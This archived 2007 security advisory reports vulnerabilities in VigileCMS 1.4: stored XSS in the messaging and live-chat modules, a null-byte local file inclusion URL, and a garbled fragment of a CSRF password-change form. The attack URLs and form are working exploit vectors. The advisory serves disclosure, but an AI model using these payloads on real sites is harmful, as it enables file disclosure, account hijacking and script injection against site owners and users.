TUCoPS :: Web :: CMS / Portals :: tb13483.htm

VigileCMS 1.4 Multiple Remote Vulnerabilities
VigileCMS 1.4 Multiple Remote Vulnerabilities
VigileCMS 1.4 Multiple Remote Vulnerabilities


VigileCMS 1.4 Multiple Remote Vulnerabilities=0D
---------------------------------------------------------------------------------------=0D
---------------------------------------------------------------------------------------=0D
Author : DevilAuron (http://devilsnight.altervista.org)=0D 
=0D
   Vendor : VigileCMS 1.4=0D
   Date   : [16-11-2007] (dd-mm-yyyy)=0D
=0D
=0D
Permanent Xss:=0D
---------------------------------------------------------------------------------------=0D
http://[site]/[path]/index.php?module=vedipm&inviapm=true=0D 
http://[site]/[path]/index.php?module=live_chat=0D 
Insert on the message the xss=0D
=0D
=0D
Local File Inclusion:=0D
---------------------------------------------------------------------------------------=0D
http://[site]/[path]/index.php?module=[somefile]%00=0D 
=0D
=0D
CSRF:=0D
---------------------------------------------------------------------------------------=0D

=0D">action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">=0D 
=0D
=0D
=0D

=0D
=0D
=0D
=0D
---------------------------------------------------------------------------------------=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH